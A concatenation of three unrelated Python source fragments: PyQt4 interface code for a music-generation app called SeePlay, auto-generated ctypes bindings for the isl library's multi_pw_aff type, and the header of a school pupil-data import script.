# oldwatchbtn.move(5, ((oldwatchbtn_slot * boxheight) + title.height() + 5))
# oldwatchbtn.clicked.connect(lambda: self.launch_old_watch(64))
# showtog = QtGui.QCheckBox("Show CV Window?", self)
# showtog.resize(window_w*0.33-10, boxheight)
# showtog.move(5, ((showtog_slot * boxheight) + title.height() + 5) - 5)
# showtog.setStyleSheet("QCheckBox { padding: 5px; color: #EFEFEF; }")
watchbtn = QtGui.QPushButton('LAUNCH', self)
watchbtn.resize(window_w*0.33-10, 2 * boxheight)
watchbtn.move(5, ((watchbtn_slot * boxheight) + title.height() + 5) - 5)
watchbtn.clicked.connect(lambda: self.launch_watch())
stopbtn = QtGui.QPushButton('STOP', self)
stopbtn.resize(window_w * 0.33 - 10, boxheight * 1)
stopbtn.move(5, ((stop_slot * boxheight) + title.height() + 5) - 5)
stopbtn.clicked.connect(lambda: self.stop_watch())
self.midibtn = QtGui.QCheckBox(self)
self.midibtn.resize(window_w * 0.33 - 10, boxheight * 1)
self.midibtn.move(10, ((midiout_slot * boxheight) + title.height() + 5) - 5)
self.midibtn.setChecked(False)
self.midibtn.stateChanged.connect(self.set_user_midioutput)
self.midibtnlbl = QtGui.QLabel('Generate MIDI file?', self)
self.midibtnlbl.resize(window_w * 0.33 - 10, boxheight * 1)
self.midibtnlbl.move(25, ((midiout_slot * boxheight) + title.height() + 5) - 5)
self.midibtnlbl.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.sheetbtn = QtGui.QCheckBox(self)
self.sheetbtn.resize(window_w * 0.33 - 10, boxheight * 1)
self.sheetbtn.move(10, ((sheetout_slot * boxheight) + title.height() + 5) - 5)
self.sheetbtn.setChecked(False)
self.sheetbtn.stateChanged.connect(self.set_user_sheetmusic)
self.sheetbtnlbl = QtGui.QLabel('Generate sheet music?', self)
self.sheetbtnlbl.resize(window_w * 0.33 - 10, boxheight * 1)
self.sheetbtnlbl.move(25, ((sheetout_slot * boxheight) + title.height() + 5) - 5)
self.sheetbtnlbl.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
mixerbtn = QtGui.QPushButton('OPEN MIXER', self)
mixerbtn.resize(window_w * 0.33 - 10, boxheight * 1)
mixerbtn.move(5, ((mixer_slot * boxheight) + title.height() + 5) - 5)
mixerbtn.clicked.connect(lambda: self.open_mixer())
# RIGHT BUTTONS
# VISUAL SETTINGS
# SLOTS
visopt_slot = 0
inputsrc_slot = 1
inputsrcinfo_slot = 2
audioopt_slot = 3
type_slot = 4
# genre_slot = 5
genreinfo_slot = 5
key_slot = 6
mode_slot = 7
prog_slot = 8
tempo_slot = 9
tsig_slot = 10
geninfo_slot = 11
stitle = QtGui.QLabel(self)
stitle.resize(window_w*0.68,boxheight)
stitle.move(window_w*0.33,0)
stitle.setText('Visual options')
stitle.setStyleSheet("QLabel { padding: 5px; font-size: 18px; text-align: center; background-color: rgba(200, 200, 200, 150); color: #333333; }")
# Look out for
inputsrc = QtGui.QLabel(self)
inputsrc.resize(window_w*0.16,boxheight)
inputsrc.move(window_w*0.33, (inputsrc_slot * boxheight) + 5)
inputsrc.setText('Input region: ')
inputsrc.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.inputsrcall = QtGui.QPushButton("Whole screen",self)
self.inputsrcall.resize(window_w*0.25,boxheight)
self.inputsrcall.move(window_w*0.33 + window_w*0.16, inputsrc_slot * boxheight + 5)
self.inputsrcall.clicked.connect(lambda: self.set_user_inputsrc("whole", False))
self.inputsrcreg = QtGui.QPushButton("Region",self)
self.inputsrcreg.resize(window_w*0.25,boxheight)
self.inputsrcreg.move(window_w*0.33 + window_w*0.41, inputsrc_slot * boxheight + 5)
self.inputsrcreg.clicked.connect(lambda: self.set_user_inputsrc("manual", True))
self.inputsrcinfo = QtGui.QLabel("",self)
self.inputsrcinfo.resize(window_w*0.66,boxheight)
self.inputsrcinfo.move(window_w * 0.33, inputsrcinfo_slot * boxheight + 5)
self.inputsrcinfo.setStyleSheet("QLabel { padding: 5px; font-style: italic; font-size: 10px; text-align: center; color: #FFFFFF; }")
# AUDIO SETTINGS
stitle2 = QtGui.QLabel(self)
stitle2.resize(window_w*0.68,boxheight)
stitle2.move(window_w*0.33, (audioopt_slot * boxheight) + 10)
stitle2.setText('Audio options')
stitle2.setStyleSheet("QLabel { padding: 5px; font-size: 18px; text-align: center; background-color: rgba(200, 200, 200, 150); color: #333333; }")
# Genre
# genre = QtGui.QLabel(self)
# genre.resize(window_w*0.16,boxheight)
# genre.move(window_w*0.33, (genre_slot * boxheight) + 15)
# genre.setText('Profile: ')
# genre.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
# self.genrebox = QtGui.QComboBox(self)
# self.genrebox.resize(window_w*0.5,boxheight)
# self.genrebox.move(window_w*0.33 + window_w*0.16, (genre_slot * boxheight) + 15)
# self.genrebox.addItem("Classical")
# self.genrebox.addItem("Electronic")
# Music type
mustype = QtGui.QLabel(self)
mustype.resize(window_w*0.16,boxheight)
mustype.move(window_w*0.33, (type_slot * boxheight) + 15)
mustype.setText('Profile: ')
mustype.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.mustypebox = QtGui.QComboBox(self)
self.mustypebox.resize(window_w*0.5,boxheight)
self.mustypebox.move(window_w*0.33 + window_w*0.16, (type_slot * boxheight) + 15)
sorted_profile = collections.OrderedDict(self.infotexts)
for key, value in sorted_profile.iteritems():
self.mustypebox.addItem(key)
self.mustypebox.activated[str].connect(lambda: self.switch_genre_box(self.mustypebox.currentText()))
# self.genrebox.activated[str].connect(lambda: self.switch_genre_info_box(self.genrebox.currentText()))
# Genre Info
self.genreinfo = QtGui.QLabel(self)
self.genreinfo.resize(window_w*0.68,boxheight)
self.genreinfo.setText(self.infotexts[self.mustypebox.currentText()])
self.genreinfo.move(window_w*0.33, (genreinfo_slot * boxheight) + 15)
self.genreinfo.setStyleSheet("QLabel { padding: 5px; font-size: 12px; font-weight: bold; text-align: center; color: #FFFFFF; }")
# Key
keysig = QtGui.QLabel(self)
keysig.resize(window_w*0.16,boxheight)
keysig.move(window_w*0.33, (key_slot * boxheight) + 15)
keysig.setText('Key: ')
keysig.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.keysigbox = QtGui.QComboBox(self)
self.keysigbox.resize(window_w*0.5,boxheight)
self.keysigbox.move(window_w*0.33 + window_w*0.16, (key_slot * boxheight) + 15)
self.keysigbox.addItem("C")
self.keysigbox.addItem("C#")
self.keysigbox.addItem("D")
self.keysigbox.addItem("Eb")
self.keysigbox.addItem("E")
self.keysigbox.addItem("F")
self.keysigbox.addItem("F#")
self.keysigbox.addItem("G")
self.keysigbox.addItem("Ab")
self.keysigbox.addItem("A")
self.keysigbox.addItem("Bb")
self.keysigbox.addItem("B")
self.keysigbox.activated[str].connect(lambda: self.set_user_key(self.keysigbox.currentText()))
# Key
mode = QtGui.QLabel(self)
mode.resize(window_w*0.16,boxheight)
mode.move(window_w*0.33, (mode_slot * boxheight) + 15)
mode.setText('Mode: ')
mode.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.modebox = QtGui.QComboBox(self)
self.modebox.resize(window_w*0.5,boxheight)
self.modebox.move(window_w*0.33 + window_w*0.16, (mode_slot * boxheight) + 15)
sorted_modes = collections.OrderedDict(self.mode_types)
for key, value in sorted_modes.iteritems():
self.modebox.addItem(key)
self.modebox.activated[str].connect(lambda: self.set_user_mode(self.modebox.currentText()))
# Key
prog = QtGui.QLabel(self)
prog.resize(window_w*0.16,boxheight)
prog.move(window_w*0.33, (prog_slot * boxheight) + 15)
prog.setText('Progression: ')
prog.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.progbox = QtGui.QComboBox(self)
self.progbox.resize(window_w*0.5,boxheight)
self.progbox.move(window_w*0.33 + window_w*0.16, (prog_slot * boxheight) + 15)
sorted_prog = collections.OrderedDict(self.prog_types)
for key, value in sorted_prog.iteritems():
self.progbox.addItem(key)
self.progbox.activated[str].connect(lambda: self.set_user_prog_type(self.progbox.currentText()))
# Time sig
sig = QtGui.QLabel(self)
sig.resize(window_w*0.16,boxheight)
sig.move(window_w*0.33, (tsig_slot * boxheight) + 15)
sig.setText('Time signature: ')
sig.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.sigbox = QtGui.QComboBox(self)
self.sigbox.resize(window_w*0.5,boxheight)
self.sigbox.move(window_w*0.33 + window_w*0.16, (tsig_slot * boxheight) + 15)
# self.sigbox.addItem("3/4")
self.sigbox.addItem("4/4")
# self.sigbox.addItem("5/4")
self.sigbox.setCurrentIndex(0)
self.sigbox.activated[str].connect(lambda: self.set_user_tsig(self.sigbox.currentText()))
# Tempo
self.tempo = QtGui.QLabel(self)
self.tempo.resize(window_w*0.16,boxheight)
self.tempo.move(window_w*0.33, (tempo_slot * boxheight) + 15)
self.tempo.setText('Tempo: ')
self.tempo.setStyleSheet("QLabel { padding: 5px; font-size: 8px; text-align: center; color: #FFFFFF; }")
self.tempobox = QtGui.QSlider(QtCore.Qt.Horizontal, self)
self.tempobox.setFocusPolicy(QtCore.Qt.NoFocus)
self.tempobox.resize(window_w*0.5,boxheight)
self.tempobox.move(window_w*0.33 + window_w*0.16, (tempo_slot * boxheight) + 15)
self.tempobox.setMinimum(60)
self.tempobox.setMaximum(180)
self.tempobox.setValue(120)
# self.tempobox.setGeometry(30, 40, 100, 30)
self.tempobox.valueChanged[int].connect(lambda: self.set_user_tempo(self.tempobox.value()))
# self.tempobox = QtGui.QComboBox(self)
# self.tempobox.addItem("Slow (80 bpm)")
# self.tempobox.addItem("Normal (120 bpm)")
# self.tempobox.addItem("Fast (160 bpm)")
# self.tempobox.setCurrentIndex(1)
# self.tempobox.activated[str].connect(lambda: self.set_user_tempo(self.tempobox.currentText()))
# General info
# geninfo = QtGui.QLabel(self)
# geninfo.resize(window_w*0.68,boxheight * 4)
# geninfo.move(window_w*0.33,(geninfo_slot * boxheight) + 20)
# geninfo.setText('General info ')
# geninfo.setStyleSheet("QLabel { padding: 5px; font-size: 12px; background-color: rgba(200, 200, 200, 150); color: #FFFFFF; }")
# CREDZ
stitle2 = QtGui.QLabel(self)
stitle2.resize(160,20)
stitle2.move(window_w-stitle2.width(),window_h-stitle2.height())
stitle2.setText('SeePlay by <NAME>, 2014')
stitle2.setStyleSheet("QLabel { padding: 2px; font-size: 10px; text-align: right; color: #CCCCCC; }")
self.set_initial_vars()
self.show()
def open_mixer(self):
print "Opening mixer."
mix_w = 400
row_w = mix_w / 4
row_h = 30
mix_h = row_h * 10
firstcolx = 0
secondcolx = row_w
thirdcolx = row_w * 2
title_slot = 0
stitle_slot = 1
header_slot = 2
drums_slot = 3
bass_slot | |
arg0.ctx
res = isl.isl_multi_pw_aff_has_range_tuple_id(arg0.ptr)
if res < 0:
raise
return bool(res)
def identity(*args):
if len(args) == 1:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_identity_multi_pw_aff(isl.isl_multi_pw_aff_copy(args[0].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
@staticmethod
def identity_on_domain(*args):
if len(args) == 1 and args[0].__class__ is space:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_identity_on_domain_space(isl.isl_space_copy(args[0].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def insert_domain(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is space:
arg1 = space(arg1)
except:
return multi_union_pw_aff(arg0).insert_domain(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_insert_domain(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_space_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def intersect_domain(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is set:
arg1 = set(arg1)
except:
return multi_union_pw_aff(arg0).intersect_domain(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_intersect_domain(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_set_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def intersect_params(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is set:
arg1 = set(arg1)
except:
return multi_union_pw_aff(arg0).intersect_params(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_intersect_params(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_set_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def involves_nan(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_involves_nan(arg0.ptr)
if res < 0:
raise
return bool(res)
def involves_param(*args):
if len(args) == 2 and (args[1].__class__ is id or type(args[1]) == str):
args = list(args)
try:
if not args[1].__class__ is id:
args[1] = id(args[1])
except:
raise
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_involves_param_id(args[0].ptr, args[1].ptr)
if res < 0:
raise
return bool(res)
if len(args) == 2 and args[1].__class__ is id_list:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_involves_param_id_list(args[0].ptr, args[1].ptr)
if res < 0:
raise
return bool(res)
raise Error
def isa_multi_aff(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_isa_multi_aff(arg0.ptr)
if res < 0:
raise
return bool(res)
def list(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_get_list(arg0.ptr)
obj = pw_aff_list(ctx=ctx, ptr=res)
return obj
def get_list(arg0):
return arg0.list()
def max(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).max(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_max(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def max_multi_val(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_max_multi_val(isl.isl_multi_pw_aff_copy(arg0.ptr))
obj = multi_val(ctx=ctx, ptr=res)
return obj
def min(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).min(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_min(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def min_multi_val(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_min_multi_val(isl.isl_multi_pw_aff_copy(arg0.ptr))
obj = multi_val(ctx=ctx, ptr=res)
return obj
def neg(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_neg(isl.isl_multi_pw_aff_copy(arg0.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def plain_is_equal(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).plain_is_equal(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_plain_is_equal(arg0.ptr, arg1.ptr)
if res < 0:
raise
return bool(res)
def product(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).product(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_product(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def pullback(*args):
if len(args) == 2 and args[1].__class__ is multi_aff:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_pullback_multi_aff(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_multi_aff_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
if len(args) == 2 and args[1].__class__ is multi_pw_aff:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_pullback_multi_pw_aff(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_multi_pw_aff_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
if len(args) == 2 and args[1].__class__ is pw_multi_aff:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_pullback_pw_multi_aff(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_pw_multi_aff_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def range_product(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).range_product(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_range_product(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def range_tuple_id(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_get_range_tuple_id(arg0.ptr)
obj = id(ctx=ctx, ptr=res)
return obj
def get_range_tuple_id(arg0):
return arg0.range_tuple_id()
def reset_range_tuple_id(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_reset_range_tuple_id(isl.isl_multi_pw_aff_copy(arg0.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def scale(*args):
if len(args) == 2 and args[1].__class__ is multi_val:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_scale_multi_val(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_multi_val_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
if len(args) == 2 and (args[1].__class__ is val or type(args[1]) == int):
args = list(args)
try:
if not args[1].__class__ is val:
args[1] = val(args[1])
except:
raise
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_scale_val(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_val_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def scale_down(*args):
if len(args) == 2 and args[1].__class__ is multi_val:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_scale_down_multi_val(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_multi_val_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
if len(args) == 2 and (args[1].__class__ is val or type(args[1]) == int):
args = list(args)
try:
if not args[1].__class__ is val:
args[1] = val(args[1])
except:
raise
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_scale_down_val(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_val_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def set_at(arg0, arg1, arg2):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg2.__class__ is pw_aff:
arg2 = pw_aff(arg2)
except:
return multi_union_pw_aff(arg0).set_at(arg1, arg2)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_set_at(isl.isl_multi_pw_aff_copy(arg0.ptr), arg1, isl.isl_pw_aff_copy(arg2.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def set_range_tuple(*args):
if len(args) == 2 and (args[1].__class__ is id or type(args[1]) == str):
args = list(args)
try:
if not args[1].__class__ is id:
args[1] = id(args[1])
except:
raise
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_set_range_tuple_id(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_id_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def size(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_size(arg0.ptr)
if res < 0:
raise
return int(res)
def space(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_get_space(arg0.ptr)
obj = space(ctx=ctx, ptr=res)
return obj
def get_space(arg0):
return arg0.space()
def sub(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).sub(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_sub(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def unbind_params_insert_domain(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_id:
arg1 = multi_id(arg1)
except:
return multi_union_pw_aff(arg0).unbind_params_insert_domain(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_unbind_params_insert_domain(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_id_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def union_add(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).union_add(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_union_add(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
@staticmethod
def zero(arg0):
try:
if not arg0.__class__ is space:
arg0 = space(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_zero(isl.isl_space_copy(arg0.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
isl.isl_multi_pw_aff_from_aff.restype = c_void_p
isl.isl_multi_pw_aff_from_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_from_multi_aff.restype = c_void_p
isl.isl_multi_pw_aff_from_multi_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_from_pw_aff.restype = c_void_p
isl.isl_multi_pw_aff_from_pw_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_from_pw_aff_list.restype = c_void_p
isl.isl_multi_pw_aff_from_pw_aff_list.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_from_pw_multi_aff.restype = c_void_p
isl.isl_multi_pw_aff_from_pw_multi_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_read_from_str.restype = c_void_p
isl.isl_multi_pw_aff_read_from_str.argtypes = [Context, c_char_p]
isl.isl_multi_pw_aff_add.restype = c_void_p
isl.isl_multi_pw_aff_add.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_add_constant_multi_val.restype = c_void_p
isl.isl_multi_pw_aff_add_constant_multi_val.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_add_constant_val.restype = c_void_p
isl.isl_multi_pw_aff_add_constant_val.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_as_map.restype = c_void_p
isl.isl_multi_pw_aff_as_map.argtypes = [c_void_p]
isl.isl_multi_pw_aff_as_multi_aff.restype = c_void_p
isl.isl_multi_pw_aff_as_multi_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_as_set.restype = c_void_p
isl.isl_multi_pw_aff_as_set.argtypes = [c_void_p]
isl.isl_multi_pw_aff_get_at.restype = c_void_p
isl.isl_multi_pw_aff_get_at.argtypes = [c_void_p, c_int]
isl.isl_multi_pw_aff_bind.restype = c_void_p
isl.isl_multi_pw_aff_bind.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_bind_domain.restype = c_void_p
isl.isl_multi_pw_aff_bind_domain.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_bind_domain_wrapped_domain.restype = c_void_p
isl.isl_multi_pw_aff_bind_domain_wrapped_domain.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_coalesce.restype = c_void_p
isl.isl_multi_pw_aff_coalesce.argtypes = [c_void_p]
isl.isl_multi_pw_aff_domain.restype = c_void_p
isl.isl_multi_pw_aff_domain.argtypes = [c_void_p]
isl.isl_multi_pw_aff_flat_range_product.restype = c_void_p
isl.isl_multi_pw_aff_flat_range_product.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_gist.restype = c_void_p
isl.isl_multi_pw_aff_gist.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_has_range_tuple_id.argtypes = [c_void_p]
isl.isl_multi_pw_aff_identity_multi_pw_aff.restype = c_void_p
isl.isl_multi_pw_aff_identity_multi_pw_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_identity_on_domain_space.restype = c_void_p
isl.isl_multi_pw_aff_identity_on_domain_space.argtypes = [c_void_p]
isl.isl_multi_pw_aff_insert_domain.restype = c_void_p
isl.isl_multi_pw_aff_insert_domain.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_intersect_domain.restype = c_void_p
isl.isl_multi_pw_aff_intersect_domain.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_intersect_params.restype = c_void_p
isl.isl_multi_pw_aff_intersect_params.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_involves_nan.argtypes = [c_void_p]
isl.isl_multi_pw_aff_involves_param_id.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_involves_param_id_list.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_isa_multi_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_get_list.restype = c_void_p
isl.isl_multi_pw_aff_get_list.argtypes = [c_void_p]
isl.isl_multi_pw_aff_max.restype = c_void_p
isl.isl_multi_pw_aff_max.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_max_multi_val.restype = c_void_p
isl.isl_multi_pw_aff_max_multi_val.argtypes = [c_void_p]
isl.isl_multi_pw_aff_min.restype = c_void_p
isl.isl_multi_pw_aff_min.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_min_multi_val.restype = c_void_p
isl.isl_multi_pw_aff_min_multi_val.argtypes = [c_void_p]
isl.isl_multi_pw_aff_neg.restype = c_void_p
isl.isl_multi_pw_aff_neg.argtypes = [c_void_p]
isl.isl_multi_pw_aff_plain_is_equal.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_product.restype = c_void_p
isl.isl_multi_pw_aff_product.argtypes | |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
wz_compat/import_pupils.py - last updated 2019-12-03
Convert the pupil data from the form supplied by the school database.
Retain only the relevant fields, add additional fields needed by this
application.
==============================
Copyright 2019 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
## For correct sorting with umlauts etc. – not used here (use ASCII converter)
#import locale
#locale.setlocale (locale.LC_COLLATE, 'de_DE.UTF-8')
# Messages
_BADSCHOOLYEAR = "Falsches Jahr in Tabelle {filepath}"
_MISSINGDBFIELD = "Feld fehlt in Schüler-Tabelle {filepath}:\n {field}"
_FIELDMISSING = "Benötigtes Feld {field} fehlt in Rohdatentabelle:\n {path}"
_WRONGLENGTH = ("Tabellenzeile hat die falsche Länge.\n Felder: {fields}"
"\n Werte: {values}")
_CLASSGONE = "Klasse '{klass}' nicht mehr in der Schuldatenbank"
_NEWCLASS = "Kasse '{klass}' wird hinzugefügt"
